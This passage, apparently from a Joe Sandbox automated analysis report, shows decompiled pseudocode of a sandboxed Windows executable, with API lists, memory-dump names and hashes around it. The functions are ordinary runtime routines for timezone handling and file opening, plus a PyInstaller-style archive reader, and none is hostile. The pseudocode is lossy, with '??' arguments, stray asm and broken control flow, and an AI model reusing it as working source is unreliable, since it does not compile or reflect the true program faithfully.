				r12d = 0;
				_a16 = r12d;
				_a24 = r12d;
				if (E00007FF77FF7DA8F4768(_t29,  &_a16) != 0) goto 0xda8f4fd5;
				if (E00007FF77FF7DA8F4708(_t29,  &_a24) != 0) goto 0xda8f4fd5;
				_t36 =  *0xda91d2b0; // 0x0
				_t23 = _t36;
				if (_t23 == 0) goto 0xda8f4dee;
				r8d =  *(__rcx + _t36 - __rcx) & 0x0000ffff;
				if (_t23 != 0) goto 0xda8f4dea;
				_t31 =  &(__rcx[1]);
				if (r8d != 0) goto 0xda8f4dd4;
				if (( *__rcx & 0x0000ffff) - r8d == 0) goto 0xda8f4e1b;
				_t39 = (_t42 | 0xffffffff) + 1;
				if (__rcx[(_t42 | 0xffffffff) + 1] != r12w) goto 0xda8f4df5;
				E00007FF77FF7DA8ECA1C(_t31, 2 + _t39 * 2);
				if (_t31 != 0) goto 0xda8f4e2a;
				return E00007FF77FF7DA8E9D68(_t31, 2 + _t39 * 2);
			}

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8F4DB5

Part of subcall function 00007FF7DA8F4708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F471C

Part of subcall function 00007FF7DA8E9D68: HeapFree.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

Part of subcall function 00007FF7DA8E9D20: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7DA8E9CFF,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8E9D29
Part of subcall function 00007FF7DA8E9D20: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7DA8E9CFF,?,?,?,?,?,00007FF7DA8E213C), ref: 00007FF7DA8E9D4E

_get_daylight.LIBCMT ref: 00007FF7DA8F4DA4

Part of subcall function 00007FF7DA8F4768: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F477C

_get_daylight.LIBCMT ref: 00007FF7DA8F501A
_get_daylight.LIBCMT ref: 00007FF7DA8F502B
_get_daylight.LIBCMT ref: 00007FF7DA8F503C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8F527C), ref: 00007FF7DA8F5063

Strings

Pacific Daylight Time, xrefs: 00007FF7DA8F5121
Pacific Standard Time, xrefs: 00007FF7DA8F5109

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 4070488512-1154798116
Opcode ID: 4d81c4733886c10eb2cb5a2f197cfa0054c7f5a467bfa3ebe6787b01c8f89471
Instruction ID: 54c32586a4094a7df6b475d4a8757fa1cef680a9392766637f084a1150e3875b
Opcode Fuzzy Hash: 4d81c4733886c10eb2cb5a2f197cfa0054c7f5a467bfa3ebe6787b01c8f89471
Instruction Fuzzy Hash: C5D19E26E0825386FB26BF2598401BDA6A1FBA4794FC44177EE4D87687DF3CE461C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F5CBC Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00007FF77FF7DA8F5CBC(void* __ecx, void* __eflags, long long __rbx, long long __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
				void* __rbp;
				signed int _t148;
				long _t161;
				void* _t165;
				signed int _t167;
				void* _t182;
				signed int _t185;
				signed int _t186;
				intOrPtr* _t234;
				intOrPtr* _t237;
				long long _t249;
				long long _t257;
				signed long long _t263;
				signed long long _t279;
				signed int* _t303;
				long long _t306;
				void* _t308;
				void* _t309;
				intOrPtr* _t311;
				void* _t312;
				void* _t320;
				void* _t322;
				void* _t326;
				void* _t330;

				_t234 = _t311;
				 *((long long*)(_t234 + 8)) = __rbx;
				 *((long long*)(_t234 + 0x10)) = __rsi;
				 *((long long*)(_t234 + 0x20)) = __rdi;
				 *((long long*)(_t234 + 0x18)) = __r8;
				_t309 = _t234 - 0x47;
				_t312 = _t311 - 0xc0;
				r12d = r9d;
				_t257 = __r8;
				r9d =  *(_t309 + 0x77);
				_t303 = __rdx;
				r8d =  *(_t309 + 0x6f);
				_t306 = __rcx;
				E00007FF77FF7DA8F59F0(r12d, __eflags, _t234, __r8, _t309 - 1, _t309);
				asm("movups xmm0, [eax]");
				asm("movsd xmm1, [eax+0x10]");
				asm("movups [ebp-0x59], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("movsd [ebp-0x39], xmm1");
				asm("movsd [ebp-0x49], xmm1");
				 *(_t309 - 0x29) = _t330 >> 0x20;
				if (r15d != 0xffffffff) goto 0xda8f5d49;
				E00007FF77FF7DA8E4374(_t234);
				 *_t234 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7DA8E4394(_t234);
				goto 0xda8f608a;
				_t148 = E00007FF77FF7DA8E6C4C(r12d, _t234, __r8, __rdx, __rdx, _t306);
				 *__rdx = _t148;
				if (_t148 != 0xffffffff) goto 0xda8f5d6e;
				E00007FF77FF7DA8E4374(_t234);
				 *_t234 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF77FF7DA8E4394(_t234);
				 *_t234 = 0x18;
				goto 0xda8f5d3d;
				r8d = r15d;
				r14d = r14d |  *(_t309 - 0x49);
				 *_t306 = 1;
				 *((long long*)(_t312 + 0x30)) = _t306;
				 *(_t312 + 0x28) = r14d;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				 *((intOrPtr*)(_t309 - 0x21)) = 0x18;
				 *((long long*)(_t309 - 0x19)) = _t306;
				 *(_t309 - 0x11) =  !(r12d >> 7) & 0x00000001;
				 *(_t309 - 0x31) =  *(_t309 - 0x49) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t185 =  *(_t309 - 0x55);
				if (_t234 != 0xffffffff) goto 0xda8f5e54;
				if ((_t185 & 0xc0000000) != 0xc0000000) goto 0xda8f5e21;
				if ((r12b & 0x00000001) == 0) goto 0xda8f5e21;
				 *((long long*)(_t312 + 0x30)) = _t306;
				asm("btr ebx, 0x1f");
				 *(_t309 - 0x55) = _t185;
				r8d = r15d;
				 *(_t312 + 0x28) = r14d;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t234 != 0xffffffff) goto 0xda8f5e54;
				_t263 =  *__rdx;
				_t237 =  *((intOrPtr*)(0xda91ca20 + (_t263 >> 6) * 8));
				 *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) =  *(_t237 + 0x38 + (_t263 + _t263 * 8) * 8) & 0x000000fe;
				E00007FF77FF7DA8E4308(GetLastError(), _t237, _t263 + _t263 * 8);
				goto 0xda8f5d3d;
				_t161 = GetFileType(_t330); // executed
				if (_t161 != 0) goto 0xda8f5eb2;
				_t186 = GetLastError();
				E00007FF77FF7DA8E4308(_t162, _t237, _t234);
				 *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) & 0x000000fe;
				CloseHandle(_t326);
				if (_t186 != 0) goto 0xda8f5d3d;
				_t165 = E00007FF77FF7DA8E4394(_t237);
				 *_t237 = 0xd;
				goto 0xda8f5d3d;
				r14b =  *(_t309 - 0x59);
				if (_t165 != 2) goto 0xda8f5ec1;
				r14b = r14b | 0x00000040;
				goto 0xda8f5eca;
				if (_t165 != 3) goto 0xda8f5eca;
				r14b = r14b | 0x00000008;
				E00007FF77FF7DA8E6B64(_t165, _t186,  *__rdx, _t257, _t234, __rdx, _t306, _t309, _t322, _t320);
				r14b = r14b | 0x00000001;
				 *(_t309 - 0x41) = r14b;
				 *(_t309 - 0x59) = r14b;
				 *( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x38 + ( *__rdx +  *__rdx * 8) * 8) = r14b;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)) + 0x39 + ( *__rdx +  *__rdx * 8) * 8)) = sil;
				if ((r12b & 0x00000002) == 0) goto 0xda8f5f3e;
				_t167 = E00007FF77FF7DA8F5BF8(_t186,  *__rdx, r12d & 0x0000003f, _t257, _t309 - 0x21);
				r14d = _t167;
				if (_t167 == 0) goto 0xda8f5f3e;
				E00007FF77FF7DA8E9EE0( *((intOrPtr*)(0xda91ca20 + ( *__rdx >> 6) * 8)), _t257, _t303);
				goto 0xda8f608a;
				asm("movups xmm0, [ebp-0x59]");
				asm("movsd xmm1, [ebp-0x39]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((intOrPtr*)(_t309 - 0x61)) = sil;
				asm("movsd [ebp+0xf], xmm1");
				r14d = E00007FF77FF7DA8F5770( *_t303, _t257, _t309 - 1, _t306, _t309 - 0x61);
				if (r14d == 0) goto 0xda8f5f75;
				goto 0xda8f5f31;
				 *((char*)( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x39 + ( *_t303 +  *_t303 * 8) * 8)) =  *((intOrPtr*)(_t309 - 0x61));
				 *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8) ^ (r12d >> 0x00000010 ^  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x3d + ( *_t303 +  *_t303 * 8) * 8)) & 0x00000001;
				if (( *(_t309 - 0x41) & 0x00000048) != 0) goto 0xda8f5fd9;
				if ((r12b & 0x00000008) == 0) goto 0xda8f5fd9;
				_t279 =  *_t303;
				_t249 =  *((intOrPtr*)(0xda91ca20 + (_t279 >> 6) * 8));
				 *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) =  *(_t249 + 0x38 + (_t279 + _t279 * 8) * 8) | 0x00000020;
				if ((_t186 & 0xc0000000) != 0xc0000000) goto 0xda8f6088;
				if ((r12b & 0x00000001) == 0) goto 0xda8f6088;
				CloseHandle(_t308);
				r8d =  *(_t309 - 0x29);
				asm("btr ebx, 0x1f");
				 *((long long*)(_t312 + 0x30)) = _t306;
				 *(_t312 + 0x28) = 0xc0000000;
				 *((intOrPtr*)(_t312 + 0x20)) =  *((intOrPtr*)(_t309 - 0x51));
				 *(_t309 - 0x55) = _t186;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t249 != 0xffffffff) goto 0xda8f606e;
				_t182 = E00007FF77FF7DA8E4308(GetLastError(), _t249,  *((intOrPtr*)(_t309 + 0x5f)));
				 *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x38 + ( *_t303 +  *_t303 * 8) * 8) & 0x000000fe;
				E00007FF77FF7DA8E6D8C(_t182, _t186,  *_t303, _t257, _t303, _t306);
				goto 0xda8f5d3d;
				 *((long long*)( *((intOrPtr*)(0xda91ca20 + ( *_t303 >> 6) * 8)) + 0x28 + ( *_t303 +  *_t303 * 8) * 8)) = _t249;
				return 0;
			}

APIs

Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5A31
Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5AAF
Part of subcall function 00007FF7DA8F59F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F5B00

CreateFileW.KERNEL32 ref: 00007FF7DA8F5DC2
CreateFileW.KERNEL32 ref: 00007FF7DA8F5E12
GetLastError.KERNEL32 ref: 00007FF7DA8F5E42
GetFileType.KERNEL32 ref: 00007FF7DA8F5E57
GetLastError.KERNEL32 ref: 00007FF7DA8F5E61
CloseHandle.KERNEL32 ref: 00007FF7DA8F5E94
CloseHandle.KERNEL32 ref: 00007FF7DA8F5FF7
CreateFileW.KERNEL32 ref: 00007FF7DA8F602C
GetLastError.KERNEL32 ref: 00007FF7DA8F603B

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: fc4e3d656f0044a26b74fdf304308c51d512279bf8c0536431011a1210b51cce
Instruction ID: f8fb22f5ef999e2b23ee530ee61776d181edcacfc9b41277b23e90fc15dd07e0
Opcode Fuzzy Hash: fc4e3d656f0044a26b74fdf304308c51d512279bf8c0536431011a1210b51cce
Instruction Fuzzy Hash: 51C1E432B28A4385FB15EFA4C4805AC7761FB99BA8B810276DE1E977D6CF39D065C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F4FEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00007FF77FF7DA8F4FEC(void* __eflags, signed int* __rax, long long __rbx, void* __rdx, void* __r9, signed int _a8, signed int _a16, signed int _a24, long long _a32) {
				void* __rsi;
				void* _t21;
				long _t28;
				intOrPtr _t31;
				void* _t33;
				void* _t36;
				void* _t37;
				void* _t38;
				signed int _t40;
				signed int _t49;
				intOrPtr _t59;
				intOrPtr _t60;
				signed int* _t63;
				long long _t69;

				_t64 = __rbx;
				_t63 = __rax;
				_a32 = __rbx;
				E00007FF77FF7DA8F4700(E00007FF77FF7DA8F46F8(_t21));
				_a8 = 0;
				_a16 = 0;
				_a24 = 0;
				if (E00007FF77FF7DA8F4768(_t63,  &_a8) != 0) goto 0xda8f515f;
				if (E00007FF77FF7DA8F4708(_t63,  &_a16) != 0) goto 0xda8f515f;
				if (E00007FF77FF7DA8F4738(_t63,  &_a24) != 0) goto 0xda8f515f;
				_t69 =  *0xda91d2b0; // 0x0
				E00007FF77FF7DA8E9D68(_t63, _t69);
				 *0xda91d2b0 = __rbx; // executed
				_t28 = GetTimeZoneInformation(??); // executed
				if (_t28 == 0xffffffff) goto 0xda8f5134;
				_t49 =  *0xda91d2d0 * 0x3c;
				_t8 = _t64 + 1; // 0x1
				_t59 =  *0xda91d316; // 0xb
				r8d =  *0xda91d324; // 0x0
				 *0xda91d2c0 = _t8;
				_a8 = _t49;
				if (_t59 == 0) goto 0xda8f509e;
				_a8 = r8d * 0x3c + _t49;
				_t60 =  *0xda91d36a; // 0x3
				if (_t60 == 0) goto 0xda8f50b9;
				_t31 =  *0xda91d378; // 0xffffffc4
				if (_t31 == 0) goto 0xda8f50b9;
				_t40 = (_t31 - r8d) * 0x3c;
				goto 0xda8f50bb;
				_a24 = _t40;
				_a16 = _t40;
				r8d = 0x80;
				E00007FF77FF7DA8DC170();
				r8d = 0x80;
				E00007FF77FF7DA8DC170();
				r8d = 0x40;
				E00007FF77FF7DA8DC170();
				r8d = 0x40;
				E00007FF77FF7DA8DC170();
				_t33 = E00007FF77FF7DA8F1BCC(_t40, 0, _t63, __rbx, _t63[2], __rdx, _t63, __r9);
				r9d = _t33;
				E00007FF77FF7DA8F5284(__rbx, 0xda91d2d4,  *_t63, _t63,  *_t63, __r9);
				r9d = _t33;
				_t36 = E00007FF77FF7DA8F46F0(E00007FF77FF7DA8F5284(_t64, 0xda91d328, _t63[2], _t63, _t63[2], __r9));
				 *_t63 = _a8;
				_t37 = E00007FF77FF7DA8F46E0(_t36);
				 *_t63 = _a16;
				_t38 = E00007FF77FF7DA8F46E8(_t37);
				 *_t63 = _a24;
				return _t38;
			}

APIs

_get_daylight.LIBCMT ref: 00007FF7DA8F501A

Part of subcall function 00007FF7DA8F4768: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F477C

_get_daylight.LIBCMT ref: 00007FF7DA8F502B

Part of subcall function 00007FF7DA8F4708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F471C

_get_daylight.LIBCMT ref: 00007FF7DA8F503C

Part of subcall function 00007FF7DA8F4738: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F474C

Part of subcall function 00007FF7DA8E9D68: HeapFree.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D7E
Part of subcall function 00007FF7DA8E9D68: GetLastError.KERNEL32(?,?,?,00007FF7DA8F1D92,?,?,?,00007FF7DA8F1DCF,?,?,00000000,00007FF7DA8F2295,?,?,?,00007FF7DA8F21C7), ref: 00007FF7DA8E9D88

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8F527C), ref: 00007FF7DA8F5063

Strings

Pacific Daylight Time, xrefs: 00007FF7DA8F5121
Pacific Standard Time, xrefs: 00007FF7DA8F5109

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 3458911817-1154798116
Opcode ID: ebf0fab6262dda880ec8a3f7829b8f0ef6cdee7ad497893a0bcebaa39c0ed705
Instruction ID: 0bcb15a6e707eba9853e317cfcc5c56de925f2ef466c3ee07c73118696121731
Opcode Fuzzy Hash: ebf0fab6262dda880ec8a3f7829b8f0ef6cdee7ad497893a0bcebaa39c0ed705
Instruction Fuzzy Hash: F2515B32A086538AF715FF21A8805ADA760BB98788FC44177EE4D83697DF3CE4518760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAE40 Relevance: 3.0, APIs: 2, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00007FF77FF7DA8DAE40(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t9;
				void* _t10;
				void* _t11;
				signed short _t21;
				void* _t23;
				void* _t27;
				intOrPtr _t37;
				intOrPtr* _t56;
				intOrPtr* _t57;
				void* _t70;

				_t58 = __rbx;
				_t56 = __rax;
				E00007FF77FF7DA8DB7E0(); // executed
				SetUnhandledExceptionFilter(??);
				goto 0xda8e8a44;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_t9 = E00007FF77FF7DA8DB2CC(1); // executed
				if (_t9 == 0) goto 0xda8dafa8;
				dil = 0;
				_v24 = dil;
				_t10 = E00007FF77FF7DA8DB290();
				_t37 =  *0xda91c560; // 0x2
				if (_t37 == 1) goto 0xda8dafb3;
				if (_t37 != 0) goto 0xda8daee4;
				 *0xda91c560 = 1;
				_t11 = E00007FF77FF7DA8E85C4(__rbx, 0xda8fa468, 0xda8fa4a8); // executed
				if (_t11 == 0) goto 0xda8daec5;
				goto 0xda8daf9d;
				E00007FF77FF7DA8E8580(_t58, 0xda8fa450, 0xda8fa460); // executed
				 *0xda91c560 = 2;
				goto 0xda8daeec;
				dil = 1;
				_v24 = dil;
				E00007FF77FF7DA8DB5E4(E00007FF77FF7DA8DB43C(_t10, 0xda8fa460));
				if ( *_t56 == 0) goto 0xda8daf1f;
				if (E00007FF77FF7DA8DB3A4(_t56, _t56) == 0) goto 0xda8daf1f;
				r8d = 0;
				_t57 =  *_t56;
				E00007FF77FF7DA8DB5EC( *0xda8fa428(_t70));
				if ( *_t57 == 0) goto 0xda8daf41;
				if (E00007FF77FF7DA8DB3A4(_t57, _t57) == 0) goto 0xda8daf41;
				E00007FF77FF7DA8E88D4( *_t57);
				_t21 = E00007FF77FF7DA8DB748(0xda8fa460);
				E00007FF77FF7DA8E852C();
				r9d = _t21 & 0x0000ffff;
				_t78 = _t57;
				_t23 = E00007FF77FF7DA8D1000(_t57); // executed
				if (E00007FF77FF7DA8DB78C(_t57) == 0) goto 0xda8dafbd;
				if (dil != 0) goto 0xda8daf77;
				E00007FF77FF7DA8E88B8(0x7ff7da8d0000, 0xda8fa460, _t57);
				E00007FF77FF7DA8DB460(1, 0);
				_t27 = _t23;
				if (E00007FF77FF7DA8DB78C(_t57) == 0) goto 0xda8dafc5;
				if (_v24 != 0) goto 0xda8daf9b;
				E00007FF77FF7DA8E88A8(0x7ff7da8d0000, 0xda8fa460, _t78);
				return _t27;
			}

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7DA8DAE49
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E8A58

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
String ID:
API String ID: 59578552-0
Opcode ID: 41e9a32394b2b47377862a5720a33bb80c0e77fc514b686da979f7caaa2f6200
Instruction ID: e907f0bfa4647146e50ff27059062b69f084d159d0509ebf60a1d0cb41e0a547
Opcode Fuzzy Hash: 41e9a32394b2b47377862a5720a33bb80c0e77fc514b686da979f7caaa2f6200
Instruction Fuzzy Hash: 42E0E630E5D143CAF91A7765484207CA4513F65320FE401FBD52D852C3DD5E66B15772

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D17B0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00007FF77FF7DA8D17B0(long long __rbx, signed long long* __rcx, long long _a16) {
				signed int _v16;
				char _v21;
				unsigned long long _v24;
				void* __rdi;
				void* _t40;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t69;
				signed long long _t84;
				signed long long _t85;
				unsigned long long _t86;
				unsigned long long _t87;
				intOrPtr* _t90;
				long long* _t93;
				void* _t102;
				void* _t110;
				char* _t118;
				void* _t124;
				unsigned long long _t125;
				long long _t127;
				void* _t128;
				void* _t131;
				void* _t132;

				_a16 = __rbx;
				_t84 =  *0xda90d008; // 0xe3add53f52b8
				_t85 = _t84 ^ _t128 - 0x00000030;
				_v16 = _t85;
				_t93 = __rcx;
				if ( *__rcx != 0) goto 0xda8d17ef;
				_t3 = _t93 + 0x78; // 0x78
				_t40 = E00007FF77FF7DA8D3C90(_t85, _t3, "rb"); // executed
				 *__rcx = _t85;
				if (_t85 == 0) goto 0xda8d1842;
				_t86 = "MEI"; // 0xe0b0a0b0049454d
				_v24 = _t86;
				r8d = 8;
				_t87 = _t86 >> 0x18;
				_v21 = _t40 + 0xc;
				E00007FF77FF7DA8D7170(_t87, __rcx, _t85,  &_v24, _t124, _t131); // executed
				_t125 = _t87;
				if (_t87 == 0) goto 0xda8d1842;
				r8d = 0;
				_t43 = E00007FF77FF7DA8DF884(_t87, _t93,  *_t93, _t125); // executed
				if (_t43 >= 0) goto 0xda8d184c;
				_t118 = "Failed to seek to cookie position!\n";
				E00007FF77FF7DA8D24D0(_t43, _t87, "fseek", _t118, _t131, _t132);
				goto 0xda8d19b3;
				_t8 = _t118 - 0x57; // 0x1, executed
				r8d = _t8;
				E00007FF77FF7DA8DF54C(_t118, _t131,  *_t93); // executed
				if (_t87 - 1 >= 0) goto 0xda8d1884;
				_t102 = "fread";
				E00007FF77FF7DA8D24D0(_t87 - 1, _t87, _t102, "Failed to read cookie!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				r8d = 0;
				asm("bswap eax");
				asm("bswap eax");
				_t51 =  *((intOrPtr*)(_t93 + 0x34));
				asm("bswap ecx");
				asm("bswap eax");
				_t127 = _t125 - _t102 + 0x58;
				 *((intOrPtr*)(_t93 + 0x34)) = _t51;
				 *((long long*)(_t93 + 8)) = _t127;
				 *((intOrPtr*)(_t93 + 0x507c)) = 0;
				 *0xda90dc74 = _t51;
				E00007FF77FF7DA8DF884(_t87, _t93,  *_t93, _t127); // executed
				0xda8e4000();
				 *(_t93 + 0x10) = _t87;
				if (_t87 != 0) goto 0xda8d18fe;
				E00007FF77FF7DA8D24D0(_t87, _t87, "malloc", "Could not allocate buffer for TOC!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				r8d = 1;
				E00007FF77FF7DA8DF54C( *((intOrPtr*)(_t93 + 0x30)), _t131,  *_t93);
				if (_t87 - 1 >= 0) goto 0xda8d1925;
				goto 0xda8d186e;
				 *((long long*)(_t93 + 0x18)) =  *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10);
				if (E00007FF77FF7DA8DF2C0( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10),  *_t93) == 0) goto 0xda8d1950;
				E00007FF77FF7DA8D2770( *((intOrPtr*)(_t93 + 0x30)) +  *(_t93 + 0x10), "Error on file.\n", "Could not read full TOC!\n", _t131,  *_t93);
				goto 0xda8d19b3;
				_t90 =  *(_t93 + 0x10);
				if (_t90 -  *((intOrPtr*)(_t93 + 0x18)) >= 0) goto 0xda8d19a1;
				asm("o16 nop [eax+eax]");
				_t69 =  *_t90;
				asm("bswap ecx");
				asm("bswap ecx");
				asm("bswap ecx");
				asm("bswap edx");
				 *_t90 = _t69;
				_t110 = _t69 + _t90;
				if (_t110 -  *(_t93 + 0x10) < 0) goto 0xda8d1995;
				if (_t110 -  *((intOrPtr*)(_t93 + 0x18)) < 0) goto 0xda8d1960;
				goto 0xda8d19a1;
				E00007FF77FF7DA8D2770(_t110, "Cannot read Table of Contents.\n", "Could not read full TOC!\n", _t131,  *_t93);
				if ( *_t93 == 0) goto 0xda8d19b1; // executed
				E00007FF77FF7DA8DF1FC(_t110, _t93,  *_t93, _t127); // executed
				 *_t93 = _t127;
				return E00007FF77FF7DA8DACF0(0,  *((intOrPtr*)(_t90 + 0xc)), _v16 ^ _t128 - 0x00000030);
			}
